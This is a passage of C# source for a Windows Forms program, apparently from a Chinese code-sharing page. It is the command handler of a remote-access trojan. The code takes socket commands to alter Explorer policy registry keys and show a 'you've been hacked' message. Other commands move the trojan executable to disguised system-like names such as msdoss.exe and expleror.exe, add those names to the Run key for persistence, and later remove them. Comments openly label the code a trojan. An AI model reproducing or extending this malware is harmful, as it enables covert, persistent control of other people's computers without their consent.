📄 form1.cs
字号:
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//************************************
if(ss=="zs1110")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//**************************************
if(ss=="zs1101")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//******************************************
if(ss=="zs1011")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs0111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs1111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以上是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPP
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以下是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
if(ss=="jg0000")
{
MessageBox.Show("你被我黑了!");
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以上是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以下是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jy0000")
{
MessageBox.Show(mystr);
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以上是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&
//##################################以下是修改木马位置###################
//||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
if(ss=="mw1000")
{
try{ File.Move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
//_____________________________________________________________________
if(ss=="mw0100")
{
try{File.Move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//______________________________________________________________________
//=======================================================================
if(ss=="mw0010")
{
try{File.Move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//===================================================================
//*******************************************************************
if(ss=="mw0001")
{
try{File.Move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//*************************************************************************
//##################################以上是改变位置##########################
//··················以下是卸载木马·················
if(ss=="xz0000")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
try{key1.DeleteValue("expleror");}
catch{}
try{key1.DeleteValue("msdoss");}
catch{}
try{key1.DeleteValue("microsoftt");}
catch{}
key1.Close();
}
catch{}
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//··················以上是卸载木马·················
}//socket
//
// TODO: Add any constructor code after InitializeComponent call
//
}//targett
/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void Dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}
#region Windows Form Designer generated code
/// <summary>
/// 设计器支持所需的方法 - 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
this.Size = new System.Drawing.Size(300,300);
this.Text = "Form1";
}
#endregion
/// <summary>
/// 应用程序的主入口点。
/// </summary>
[STAThread]
static void Main()
{
Application.Run(new Form1());
}
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -